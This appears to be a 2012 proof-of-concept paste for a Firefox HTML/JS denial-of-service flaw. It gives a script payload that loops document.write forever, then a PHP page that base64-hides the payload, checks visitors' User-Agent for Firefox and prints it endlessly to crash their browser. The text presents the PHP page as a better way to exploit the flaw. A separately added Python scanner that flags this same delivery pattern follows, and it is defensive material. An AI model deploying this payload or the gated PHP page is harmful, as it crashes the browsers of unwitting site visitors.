- Title : Mozilla Firefox HTML/JS DOS Vulnerability - POC
- Version : Mozilla Firefox Beta Version and Normal 17.0.1
- Date : 2012-12-06
- Vendor : http://www.mozilla.org
- Impact : Medium
- Contact : sergioyoshiman [at] gmail.com
- Twitter : @sergioyoshiman
- Tested : Windows XP SP3 & Windows 7 SP1
- Author : Sergio Yoshikata - Lima, Peru
- ==============================================================
- Mozilla Firefox JS POC
- "/><script>while(true){document.write ('"><img src=x onerror=alert(2)>/foobar');}</script>
- ==============================================================
- A better way to exploit the vulnerability is to use a PHP script that checks whether the visitor is using the Firefox browser and then
- prints the crash exploit.
- ==============================================================
- <!DOCTYPE html>
- <html>
- <body>
- <?php
- /* Mozilla Firefox HTML/JS DOS Vulnerability - POC by Sergio Yoshikata - @sergioyoshiman
- Base64 encoded exploit "/><script>while(true){document.write ('"><img src=x onerror=alert(2)>/foobar');}</script>*/
- $exploit= 'Ii8+PHNjcmlwdD53aGlsZSh0cnVlKXtkb2N1bWVudC53cml0ZSAoJyI+PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDIpPi9mb29iYXInKTt9PC9zY3JpcHQ+';
- // check whether the visitor is using Mozilla Firefox
- $firefox = strpos($_SERVER["HTTP_USER_AGENT"], 'Firefox') ? true : false;
- if ($firefox)
- {
- //loop forever
- while(1) {
- //print exploit code infinite times.
- print(base64_decode($exploit));
- }
- }
- ?>
- </body>
- </html>
- ==============================================================
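A static triage check for the delivery pattern described above (a script payload hidden in a base64 literal, an unbounded document.write loop, and User-Agent gating), added here as an example and not part of the original paste. The function names, finding labels and both sample snippets are assumptions constructed for illustration.

```python
import base64
import binascii
import re

# Quoted literals made only of base64 characters, long enough to hide markup.
B64_LITERAL = re.compile(r"""['"]([A-Za-z0-9+/]{24,}={0,2})['"]""")
# An unconditional JS loop whose body starts by calling document.write.
WRITE_LOOP = re.compile(
    r"(while\s*\(\s*(true|1)\s*\)|for\s*\(\s*;\s*;\s*\))"
    r"\s*\{[^}]*document\.write",
    re.I,
)
UA_GATE = re.compile(r"HTTP_USER_AGENT|navigator\.userAgent")


def decode_literals(source):
    """Yield the text of each string literal that is valid base64 and UTF-8."""
    for match in B64_LITERAL.finditer(source):
        try:
            yield base64.b64decode(match.group(1), validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue  # not base64, or binary data rather than markup


def scan_source(source):
    """Return sorted finding labels for one server-side source file."""
    findings = set()
    for text in [source, *decode_literals(source)]:
        hidden = text is not source  # True for decoded literals only
        if hidden and re.search(r"<\s*script", text, re.I):
            findings.add("base64-hidden-script")
        if WRITE_LOOP.search(text):
            findings.add("unbounded-document-write")
    if findings and UA_GATE.search(source):
        findings.add("user-agent-gated")  # output differs per browser
    return sorted(findings)


def encode_sample(text):
    return base64.b64encode(text.encode()).decode()


# Constructed samples for this example (not taken from the paste).
SUSPICIOUS = (
    "<?php $p = '" + encode_sample("<script>while(true){document.write('x');}</script>")
    + "';\nif (strpos($_SERVER['HTTP_USER_AGENT'], 'Firefox') !== false)"
    " { print(base64_decode($p)); } ?>"
)
BENIGN = "<?php $v = '" + encode_sample("plain configuration value, nothing executable") + "'; echo $v; ?>"
```

The User-Agent finding is only reported alongside another finding, since reading the header on its own is routine in legitimate code.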